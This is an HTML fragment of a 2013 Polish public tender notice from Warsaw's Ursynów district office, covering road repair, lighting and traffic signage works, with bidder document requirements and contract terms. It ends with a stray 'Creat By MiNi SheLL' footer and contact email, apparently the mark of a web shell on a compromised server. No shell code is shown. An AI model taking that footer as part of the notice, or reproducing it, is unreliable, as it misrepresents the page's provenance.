<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.W celu potwierdzenia spełniania warunku udziału w postępowaniu opisanego w w sekcji III. pkt 3.4) pppk 1. lit. a)-b) Ogłoszenia (dotyczy Części I zamówienia) oraz/albo w w sekcji III. pkt 3.4) pppk 2. lit. a) Ogłoszenia (dotyczy Części II zamówienia) Zamawiający nie wymaga od Wykonawcy dołączenia do oferty wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami.
2. W przypadku gdy Wykonawca będzie polegał na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia - innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Wskazać należy, iż w myśl bieżącej linii orzeczniczej (np. wyrok KIO z dnia 18.05.2010 r., sygn. akt. 786/10, wyrok KIO z 14.07.2010 r., sygn. akt 1333/10,  wyrok KIO z dnia 03.09.2010 r., sygn. akt. 1801/10, wyrok KIO z dnia 18.11.2010 r., sygn.akt. 2407/10):
Udowodnienie dysponowania wymienionymi w art. 22 ust. 1 pkt 2) - 4) ustawy Prawo zamówień publicznych zasobami może mieć różną postać oraz treść - stosownie do rodzaju tego zasobu a także stosunku prawnego łączącego wykonawcę z podmiotem udzielającym zasobu jak i charakteru i zakresu porozumienia pomiędzy tymi podmiotami. Udowodnienie to powinno obejmować nie tylko wykazanie faktu udostępnienia niniejszemu Wykonawcy zasobów przez uprawnionego ich dysponenta (podmiot trzeci udzielający odpowiednich zasobów), ale także winno wyrażać w sposób wyraźny i jednoznaczny wolę udzielenia wykonawcy ubiegającemu się o zamówienie odpowiedniego zasobu - wskazywać jego rodzaj, czas udzielenia a także inne istotne okoliczności, w tym, wynikające ze specyfiki tego zasobu. Jeżeli zatem przedmiotem udostępnienia na podstawie art. 26 ust. 2 b ustawy Prawo zamówień publicznych są zasoby takie jak wiedza i doświadczenie wymagane dla realizacji zamówienia, to wskazane zobowiązanie powinno uwzględniać taki właśnie charakter tego zasobu, w tym okoliczność, że nie jest możliwe przeniesienie czy udostępnienie wiedzy lub doświadczenia bez osobistego uczestnictwa podmiotu w realizacji przyszłego zamówienia. Powyższe uczestnictwo, w dowolnej, dozwolonej przez prawo postaci (jako podwykonawca, doradca, czy na innej podstawie) musi jednak zostać wykazane przez Wykonawcę, bowiem nie można przekazać, ani zobowiązać się do udzielenia wiedzy i doświadczenia bez osobistego udziału udzielającego tych zasobów w realizacji zamówienia. W przeciwnym bowiem wypadku, w sytuacji gdy brak w ogóle informacji o zaangażowaniu podmiotu udzielającego doświadczenia w realizacji zamówienia - Zamawiający będzie uprawniony do uznania, że Wykonawca polegający na zasobach innego podmiotu, przedkładający samo tylko zobowiązanie do udostępnienia wiedzy i doświadczenia innego podmiotu bez wskazania uczestnictwa tego podmiotu w wykonaniu zamówienia, nie udowodnił dysponowania odpowiednim zasobem</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W odniesieniu do art.144 ust.1 ustawy Prawo zamówień publicznych - Zamawiający zastrzega sobie możliwość zmiany warunków umowy na etapie jej realizacji w zakresie określonym w §14 wzoru umowy stanowiącego załącznik nr 6a) do SIWZ- dotyczy Części I oraz (dotyczy Części I oraz Części II) w zakresie:
1.Maksymalnej ilości danych robót w zakresie danej Części zamówienia, z zastrzeżeniem iż nie może zostać przekroczona: maksymalna cena ofertowa brutto w zakresie danej Części zamówienia.
2.Zmiany w spisie dróg gminnych i wewnętrznych wprowadzonych np. uchwałą Rady m.st. Warszawy;
3.Zmiany podwykonawcy z powodu zdarzeń, tj. rozwiązanie umowy łączącej go z Wykonawcą, jego likwidacja, nienależyta staranność stwierdzona przez Zamawiającego lub zakresu robót zlecanych w ramach podwykonawstwa.
4.Zmniejszenia wynagrodzenia w zakresie danej Części z tego powodu, że wykonanie części zamówienia nie leży w interesie publicznym, czego nie można było przewidzieć w dniu zawarcia umowy lub z powodu rezygnacji z wykonania części zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ursynow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> osobiście w Urzędzie m. st. Warszawy Dzielnicy Ursynów, 02-777 Warszawa, Al. KEN 61 pok. nr 333.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.02.2013 godzina 11:30, miejsce: SIEDZIBA ZAMAWIAJACEGO PRZY AL. KEN 61, WYDZIAŁ INFRASTRUKTURY,  
POK. NR 407.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Utrzymanie, remont, konserwacja, naprawa i modernizacja oświetlenia w drogach gminnych oraz drogach będących we władaniu m.st. Warszawy znajdujących się na terenie Dzielnicy Ursynów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres prac objętych zamówieniem w odniesieniu do Części I obejmuje:
1)  Naprawy - roboty związane z usuwaniem awarii, a w szczególności likwidacją uszkodzeń oznakowania drogowego i nawierzchni drogowych zagrażających bezpieczeństwu ruchu kołowego lub pieszego;
2) Utrzymanie - roboty związane z bieżącym wykonywaniem prac zmierzających do zwiększenia bezpieczeństwa i wygody ruchu;
3)  Konserwację - roboty związane z wykonywaniem napraw bieżących nawierzchni jezdni i chodników bez zmiany konstrukcji nawierzchni;
4)  Remonty - roboty związane z wykonywaniem prac przywracających pierwotny stan drogi, także przy użyciu wyrobów budowlanych innych niż użyte w stanie pierwotnym.
2. Zakres rzeczowy robót objętych zamówieniem w odniesieniu do Części I obejmuje:
2.1. Konserwację i remonty cząstkowe ulic na terenie Dzielnicy Ursynów na całej szerokości pasa drogowego, a w szczególności wykonywanie robót w następujących zakresach:
1) Roboty ziemne:
a) roboty ziemne mechaniczne z odwiezieniem urobku;
2) Warstwy odsączające i podsypkowe i podbudowy:
a) warstwy podsypkowe cementowo - piaskowe;
b) podbudowy betonowe;
c) podbudowy z tłucznia kamiennego sortowanego;
3) Nawierzchnie dróg nieulepszone:
a) nawierzchnie gruntowe;
b) nawierzchnie żwirowe i z kruszywa kamiennego;
c) nawierzchnie tłuczniowe kamienne;
d) nawierzchnie brukowe;
e) nawierzchnie z płyt żelbetowych (MON);
f) nawierzchnie z płyt drogowych wielootworowych;
g) nawierzchnie z płyt drogowych o grubości 15 cm;
4) Nawierzchnie ulepszone:
a) nawierzchnie z mieszanek mineralno-bitumicznych grysowych;
b) nawierzchnie z mieszanek mastyksowo-grysowych (SMA);
c) nawierzchnie z kostki brukowej;
d) ułożenie geowłókniny, siatki wzmacniającej; 
5) Krawężniki i obrzeża:
a) krawężniki betonowe na podsypce cementowo-piaskowej na ławach z oporem;
b) obrzeża betonowe 30x8 cm na podsypce piaskowej;
6) Chodniki:
a) chodniki z kostki brukowej betonowej grubości 8 cm i 6 cm na podsypce piaskowej i cementowo-piaskowej;
b) chodniki z płyt betonowych 50x50x7 cm na podsypce piaskowej;
7) Roboty rozbiórkowe:
a)rozebranie i frezowanie nawierzchni z mas mineralno-bitumicznych z odwiezieniem gruzu;
b) rozebranie nawierzchni z płyt żelbetowych MON;
c) rozebranie nawierzchni z płyt drogowych wielootworowych;
d)rozebranie chodników z płyt betonowych i rozebranie nawierzchni z kostki brukowej z odwiezieniem gruzu;
e) rozebranie krawężników betonowych;
f) rozebranie obrzeży trawnikowych;
8) Remonty cząstkowe jezdni o nawierzchniach bitumicznych z odwiezieniem gruzu:
a) zabezpieczenie uszkodzonej nawierzchni;
b)remonty cząstkowe nawierzchni bitumicznych mieszanką mineralno-asfaltową;
9) Roboty naprawczo-konserwacyjne:
a) naprawy dróg gruntowych - profilowanie z zagęszczeniem;
b) ścinanie poboczy z odwiezieniem ziemi;
10) Urządzenia odwodnieniowe:
a) ułożenie rur drenarskich O 100 mm i O 300 mm;
b) odtworzenie rowów odparowalnych;
c) oczyszczenie studni chłonnych;
d) regulacja pionowa zaworów wodociągowych, gazowych, włazów kanałowych, kratek ściekowych ulicznych oraz studni teletechnicznych;
11) Opracowanie czasowej organizacji ruchu zwiazanej z remontem kapitalnym nawierzchni dróg;
12)Modernizacja, przebudowa oświetlenia ulicznego nastąpi na postawie projektu lub ustaleń przeprowadzonych w dniu wprowadzenia na budowę.
3. Sposób realizacji przedmiotu zamówienia w odniesieniu do Części I:
1) Do robót Wykonawca będzie przystępował po sporządzeniu i przekazaniu przez Zamawiającego protokołu wprowadzenia:
a) W protokole będzie określony zakres robót i termin wykonania. Po sporządzeniu protokołu wprowadzenia Wykonawca zobowiązany jest wykonać dokumentację zdjęciową danego obiektu;
b)Teren robót należy zabezpieczyć i oznakować, zgodnie z obowiązującymi przepisami;
c)Roboty należy prowadzić w sposób, który nie powoduje znacznych utrudnień w ruchu;
d) Wykonawca dokumentuje wykonanie poszczególnego etapu robót budowlanych poprzez wykonanie zdjęć;
e) Zamawiający przystąpi do odbioru prac nie później niż w ciągu 7 dni od daty zgłoszenia odbioru;
2) Rozliczenie prac zgłoszonych do odbioru nastąpi na podstawie:
a) Bezusterkowego protokołu odbioru;
b)Zaakceptowanych przez Zamawiającego obmiarów i kosztorysów powykonawczych wraz ze szkicem sytuacyjnym.
Przy powstawaniu nowych zrealizowanych inwestycji drogowych Wykonawca wykonuje dokumentację powykonawczą z naniesieniem na mapę zasadniczą miasta.
	
Powyższy opis określa treść załącznika nr 1 do wzoru umowy stanowiącego załącznik nr 6a) do SIWZ.

Szczegółowy opis przedmiotu zamówienia w odniesieniu do Części I określają wzór umowy stanowiący załącznik nr 6a) do SIWZ, wykaz dróg gminnych stanowiący załącznik nr 7a) do SIWZ oraz stanowiący równocześnie załącznik nr 4 do wzoru umowy, wykaz dróg wewnętrznych stanowiący załącznik nr 7b) do SIWZ oraz stanowiący równocześnie załącznik nr 5 do wzoru umowy, a także:
1.Dokumentacja projektowa: Przedmiar robót - stanowiący załącznik nr 5ab) do SIWZ;
2.Specyfikacja techniczna wykonania i odbioru robót - stanowiąca załącznik nr 5aa) do SIWZ oraz stanowiąca równocześnie załącznik nr 2 do wzoru umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.31.61.10-9, 45.23.24.52-5, 71.00.00.00-8, 77.31.41.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Oznakowanie pionowe i poziome oraz urządzenia bezpieczeństwa ruchu drogowego w ramach utrzymania i wdrażanie projektów organizacji ruchu w drogach gminnych oraz drogach będących we władaniu m.st. Warszawy znajdujących się na terenie Dzielnicy Ursynów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zakres prac objętych zamówieniem w odniesieniu do Części II obejmuje:
1)Poprawę oznakowania pionowego i poziomego oraz urządzeń bezpieczeństwa ruchu;
2)Wdrażanie projektów organizacji ruchu;
2. Zakres rzeczowy robót objętych zamówieniem w odniesieniu do Części II obejmuje:
2.1. Poprawę oznakowania pionowego i poziomego oraz urządzeń bezpieczeństwa ruchu na terenie Dzielnicy Ursynów na całej szerokości pasa drogowego, a w szczególności wykonywanie robót w następujących zakresach:
1) Oznakowanie pionowe i poziome oraz urządzenia bezpieczeństwa ruchu drogowego:
a)odnawianie oznakowania poziomego jezdni farbą chlorokauczukową i chlorokauczukową z dodatkami mikrokulek szklanych;
b)wymiana oznakowania pionowego zniszczonych znaków drogowych, słupów do znaków drogowych, luster okrągłych i prostokątnych oraz słupów wygrodzeniowych, łańcuchów i pylonów oraz zapór;
c)prostowanie sztyc do znaków drogowych i słupów wygrodzeniowych;
d)naprawa i wykonywanie urządzeń bezpieczeństwa ruchu drogowego.
2)Wdrażanie projektów organizacji ruchu na terenie Dzielnicy Ursynów na całej szerokości pasa drogowego zgodnie z zatwierdzonymi projektami oraz ze szczegółowymi warunkami technicznymi dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunkami ich umieszczania na drogach określonymi w załącznikach od nr 1 do nr 4 do rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa ruchu drogowego i warunków ich umieszczania na drogach (Dz.U. 2003, Nr 220, poz.2181 zał., z późn. zm.).
3. Sposób realizacji przedmiotu zamówienia w odniesieniu do Części II:
1) Do robót Wykonawca będzie przystępował po sporządzeniu i przekazaniu przez Zamawiającego protokołu wprowadzenia:
a) W protokole będzie określony zakres robót i termin wykonania;
b)Teren robót należy zabezpieczyć i oznakować, zgodnie z obowiązującymi przepisami;
c)Roboty należy prowadzić w sposób, który nie powoduje znacznych utrudnień w ruchu;
d) Zamawiający przystąpi do odbioru prac nie później niż w ciągu 7 dni od daty zgłoszenia odbioru;
2) Rozliczenie prac zgłoszonych do odbioru nastąpi na podstawie:
a) Bezusterkowego protokołu odbioru;
b)Zaakceptowanych przez Zamawiającego obmiarów i kosztorysów powykonawczych.

Powyższy opis określa treść załącznika nr 1 do wzoru umowy stanowiącego załącznik nr 6b) do SIWZ.

Szczegółowy opis przedmiotu zamówienia w odniesieniu do Części II określają wzór umowy stanowiący załącznik nr 6b) do SIWZ, wykaz dróg gminnych stanowiący załącznik nr 7a) do SIWZ oraz stanowiący równocześnie załącznik nr 4 do wzoru umowy, wykaz dróg wewnętrznych stanowiący załącznik nr 7b) do SIWZ oraz stanowiący równocześnie załącznik nr 5 do wzoru umowy, a także:
1.Dokumentacja projektowa: Przedmiar robót - stanowiący załącznik nr 5bb) do SIWZ;
2.Specyfikacja techniczna wykonania i odbioru robót - stanowiąca załącznik nr 5ba) do SIWZ oraz stanowiąca równocześnie załącznik nr 2 do wzoru umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.50-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com